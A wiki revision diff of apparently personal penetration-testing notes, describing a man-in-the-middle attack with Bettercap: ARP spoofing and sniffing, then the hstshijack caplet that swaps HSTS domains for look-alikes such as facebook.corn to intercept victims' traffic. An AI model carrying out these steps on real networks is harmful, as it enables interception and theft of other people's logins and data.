Differences

This shows you the differences between two versions of the page.

--- hack_postconnect_bypasshttps [2020/05/31 17:51] – [HTTPS] gman
+++ hack_postconnect_bypasshttps [2020/05/31 18:09] (current) – [HSTS Hijack] gman
@@ Line 8: / Line 8: @@
-====== HTTPS Hijack ======
+===== HTTPS Hijack =====
 MITM Attack using a **BetterCap** caplet: hstshijack
@@ Line 30: / Line 30: @@
 net.sniff on
 </code>
+Run Bettercap with the custom spoof caplet:
+<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>
+Once you successfully run that (should have arp.spoof, net.probe/recon/sniff), run the hsts caplet:
+  * From inside bettercap, run ``caplets.show`` to see all the available caplets.
+  * To run a caplet you simply type its name at the bettercap prompt.
+  * If you see no errors, it executed as expected.
 ----
-====== HSTS Hijack ======
+===== HSTS Hijack =====
+**HSTS: HTTP Strict Transport Security**
+  * Modern browsers are hard-coded to only load a list of HSTS websites over https (this is a local check done by the browser on the client/target machine).
+  * Because this is a function of the browser on the client (target), the MITM hijack is defeated.
+The only way around this is to make the browser think it is loading another web site.
+  * Replace all links for HSTS websites with similar links.
+  * facebook.com replaced with facebook.corn
+  * twitter.com replaced with twiter.com
+  * These are configured in hstshijack.cap
-----
+Even with this hack, if the client/target types in facebook.com, this will NOT work.
+  * This is because the browser has a check list and will not load certain sites if they cannot be loaded over https.
+This will only work if the client/target uses a search engine that does not use https first to search for the site to access.
+  * Example: google.ie
+  * On that search site, search for facebook... our MITM hijack will replace all facebook.com urls with facebook.corn
+  * This still might not work with updated browsers.
+----